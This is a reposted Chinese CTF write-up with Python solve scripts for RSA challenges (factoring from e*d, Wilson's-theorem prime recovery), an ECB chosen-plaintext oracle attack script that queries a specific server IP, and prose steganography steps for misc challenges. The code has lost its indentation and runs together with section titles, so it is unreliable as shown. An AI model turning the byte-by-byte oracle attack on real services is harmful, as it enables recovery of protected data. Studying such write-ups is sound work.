#!coding=utf8
import sympy
from gmpy2 import gcd,invert
from random import randint
from Crypto.Util.number import *
import random
flag=b"flag{XXX}"
def gen_prime(N):
A=0
while 1:
A=getPrime(N)
if A%4==3:
break
return A
def gen_N(A,B):
result=1
for i in range(2,B+1):
result=(result*i)%A
return result
def rev_gen_N(A,C):
result = A-1
for i in range(C+1,A): # C+1 开始,到n-1
result = (invert(i, A) * result) % A
return result
def gen_p():
A=17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928699539
B=(A-1)//2
C=17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928632158
N1 = 1 # or A-1
# N1 = A-1 # or A-1
N2 = rev_gen_N(A,C)
print(N1,N2)
seed1=2019*N1+2020*N2
return sympy.nextprime(seed1)
def getpq(n,ed):
p = 1
q = 1
while p==1 and q==1:
k = ed - 1 # s * phin
g = random.randint ( 0 , n )
while p==1 and q==1 and k % 2 == 0:
k = k//2
y = pow(g,k,n)
if y!=1 and gcd(y-1,n)>1:
p = gcd(y-1,n)
q = n//p
return q,p
def gen_q():
n = 641840878174982655326850312496169636378455577115347500957057267640600977102280072913438154955029114771051709087809927454279064916870408880749853740239718248642560401110078626938726443568692572803490357236810832674229312155746539894173791356805341671586393273678865952155249500341932905426105470392415353610397045835698808163501258474762363712287163328526252399904787053101799058499120606154737990300449437479282435046167055009692493712202386368849122605419812883126887833074654434641607372149411668612504466768080306339558792828063148576123738980431264608446603326193849200810553196864085478463086993422774817059853949748247896512719994166090254440232652496451104455075071560127966288341488523110118075041150491577844082366096788215046025436488554795141938458493258409150407281215473354273599246314944034941237527510171900646139987019380766717951556307441871365874564881565374638513827494801194029940895912077179028101890662760455651864691251980479400416227456995236912364846811949410786643764713673564022863007331006828562341241738846980912184411395632790556038655767763976115640962139547171909279164623846000835333857705944581269631616760405747716520672142021728850694537269211784578408601266217928819863736428173736140161826738813
ed = 534634151124279413732259524933495479098721499860333007593590357554306358799023578194908726136928354695079848972480649724456088941906723794709312712191247045425297126517594344899286925836796680956816064609089090503579894117057252969264121691849003333804607728687046319857910698511132867345476426833313854575436202087209472834349551593011689755514138197238955298350562839877955001729313715223006875793667570760703418551390980455326976431990257513342820095246552412287184147009729875110446230949824384166464485840066906862476445054049749692262294734099027915906839812656254886862402603631321290156949953461665657610306709058617222159635281067103921037090824796905267992798715820128476225045484793453227511548884919811033318570386881936137713666127231317606909893143214808788822341878386939352957962886113639632559883992777992209148001401767753558732492213499792179169681405789041595765504039612494711563472885565786566625643290565526077483663342991770220261962082523632475094223960703649343802215392245948547397211539801128773253646005228684994277460378625729491412757387260415740823541731482803143732545953736392746596116269262129834845033889284145602522548909021358829175225208236295389454408336909318816490014229410357900614079212880259236238467905
p, q = getpq(n, ed)
seed2=2020*p-2019*q
if seed2<0:
seed2=(-1)*seed2
return sympy.nextprime(seed2)
if __name__=="__main__":
_E=65537
_P=gen_p()
_Q=gen_q()
c = 183288709028723976658160448336519698700398459340947322152692016513169599029222514445118399653225032641541100129985101994918772329046946295962244096646038598600865786096896989355554955041779941259413115779915405468832327321189345505283184153652727885422718280179025251186380977491993641792341259672566237363655347151343020354489781675539571788934759950303331075098574759853670802171054084321131703969504258663714257549258635956184694450566287845760701724862418909255930636298209146539578608879672058346906370035692078859844402832322545368347681121504910035471822137023626638953992968941166744998545450662434365836169688461834868137046528403401190395486501502489519341656581057940794141420456022102711505759074332049547354944074402136763186087462931985682293826106916791831371302
phin = (_P-1) *(_Q-1)
d = invert(_E, phin)
print(long_to_bytes(pow(c,d,_P*_Q)))
'''
output:
A:17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928699539
C:17837832555368308689786098708027973117794970348203719986383141676940062201987761202777419099369816828481341695174601689881519219806887761505932440928632158
n:641840878174982655326850312496169636378455577115347500957057267640600977102280072913438154955029114771051709087809927454279064916870408880749853740239718248642560401110078626938726443568692572803490357236810832674229312155746539894173791356805341671586393273678865952155249500341932905426105470392415353610397045835698808163501258474762363712287163328526252399904787053101799058499120606154737990300449437479282435046167055009692493712202386368849122605419812883126887833074654434641607372149411668612504466768080306339558792828063148576123738980431264608446603326193849200810553196864085478463086993422774817059853949748247896512719994166090254440232652496451104455075071560127966288341488523110118075041150491577844082366096788215046025436488554795141938458493258409150407281215473354273599246314944034941237527510171900646139987019380766717951556307441871365874564881565374638513827494801194029940895912077179028101890662760455651864691251980479400416227456995236912364846811949410786643764713673564022863007331006828562341241738846980912184411395632790556038655767763976115640962139547171909279164623846000835333857705944581269631616760405747716520672142021728850694537269211784578408601266217928819863736428173736140161826738813
e*d:534634151124279413732259524933495479098721499860333007593590357554306358799023578194908726136928354695079848972480649724456088941906723794709312712191247045425297126517594344899286925836796680956816064609089090503579894117057252969264121691849003333804607728687046319857910698511132867345476426833313854575436202087209472834349551593011689755514138197238955298350562839877955001729313715223006875793667570760703418551390980455326976431990257513342820095246552412287184147009729875110446230949824384166464485840066906862476445054049749692262294734099027915906839812656254886862402603631321290156949953461665657610306709058617222159635281067103921037090824796905267992798715820128476225045484793453227511548884919811033318570386881936137713666127231317606909893143214808788822341878386939352957962886113639632559883992777992209148001401767753558732492213499792179169681405789041595765504039612494711563472885565786566625643290565526077483663342991770220261962082523632475094223960703649343802215392245948547397211539801128773253646005228684994277460378625729491412757387260415740823541731482803143732545953736392746596116269262129834845033889284145602522548909021358829175225208236295389454408336909318816490014229410357900614079212880259236238467905
ciphertext:183288709028723976658160448336519698700398459340947322152692016513169599029222514445118399653225032641541100129985101994918772329046946295962244096646038598600865786096896989355554955041779941259413115779915405468832327321189345505283184153652727885422718280179025251186380977491993641792341259672566237363655347151343020354489781675539571788934759950303331075098574759853670802171054084321131703969504258663714257549258635956184694450566287845760701724862418909255930636298209146539578608879672058346906370035692078859844402832322545368347681121504910035471822137023626638953992968941166744998545450662434365836169688461834868137046528403401190395486501502489519341656581057940794141420456022102711505759074332049547354944074402136763186087462931985682293826106916791831371302
'''NewsWebsite
EBC 明文攻击
import requests import json import codecs import base64 BS = 16 pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) url = "http://47.95.14.176:8233/" def publish(username,email,content): text = requests.post(url + '/api/comment/news/27',json={ "commentEmail":email, "commentContent":content, "commentNickname":username }).text data = json.loads(text) id = data['commentId'] # print(data) text = requests.get(url + 'api/comment/news/27?size=10&page=0&sort=commentId%2Cdesc').text data = json.loads(text) for i in data['content']: if(i[b'commentId'] == id): # print(i[b'commentContent']) return i a = [] j = 7 flag = "" charset = "gl{}-1234567890abcdef" for i in range(50): print(i) # print(codecs.encode(padding('f'),'hex')) for c in charset: print "=======char:{},j:{}".format(c,j) ret = publish('1','1',c + flag + 24*chr(j)+ 'fffff') a.append(ret['commentContent']) data = base64.b64decode(ret['commentContent']) print data[:8].encode('hex'),data[64-8:64].encode('hex'),j,len(data) if(data[:8].encode('hex')==data[64-8:64].encode('hex')): flag = c + flag print "flaggg : ",flag j -= 1 if(j == 0): j == 8 j = j % 8
EasyRSA
from gmpy2 import mpz,powmod,invert
import sys
sys.path.append('/root/桌面/rsa')
from solve_equ import Solve
def mypow2(bit):
result=mpz(1)
for i in range(bit):
result*=2
return result
n=mpz(7772032347449135823378220332275440993540311268448333999104955932478564127911903406653058819764738253486720397879672764388694000771405819957057863950453851364451924517697547937666368408217911472655460552229194417053614032700684618244535892388408163789233729235322427060659037127722296126914934811062890693445333579231298411670177246830067908917781430587062195304269374876255855264856219488896495236456732142288991759222315207358866038667591630902141900715954462530027896528684147458995266239039054895859149945968620353933341415087063996651037681752709224486183823035542105003329794626718013206267196812545606103321821)
c=mpz(2082303370386500999739407038433364384531268495285382462393864784029350314174833975697290115374382446746560936195242108283558410023998631974392437760920681553607338859157019178565294055755787756920003102506579335103169629546410439497570201554568266074421781047420687173530441469299976286281709526307661219925667082812294328343298836241624597491473793807687939912877432920934022304415340311930199467500833755390490763679081685821950332292303679223444816832000945972744492944044912168217765156110058474974887372388032286968936052010531850687361328326741707441938740295431353926037925950161386891437897990887861853097318)
for bit in range(100,4096):
temp=mypow2(bit)-mpz(65538)
temp1=Solve(1,-temp,n)
if isinstance(temp1,list):
print(temp1)
break
elif temp1==0:
pass
else:
print(temp1)
p,q=temp1
e=mpz(65537)
d=invert(e,(p-1)*(q-1))Misc
funnygame
在资源文件理由扫雷.png,可以提取出压缩包,得到secret.txt
通过图片隐写得到OPENSSL加密密码,将其反转,得到flag.wav,听音得flag
签到
看视频
funnygame
binwalk图片得到密文,pyc隐写解密得到aeskey,
解密能够得到字节取反的文件,写脚本倒过来后,可以得到zip文件。
其中有音乐,用audacity打开,按时间取反,听到flag的读音。
Code_in Mouse
导出http流,得到index文件中由莫斯电码解密,后得到最后几位有4个=,用base32解密。可以得到网址,进入有一个图片,下载下来之后winhex查看里面有F5提示,F5隐写运行得到flag.
文章来源: http://xz.aliyun.com/t/7281
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh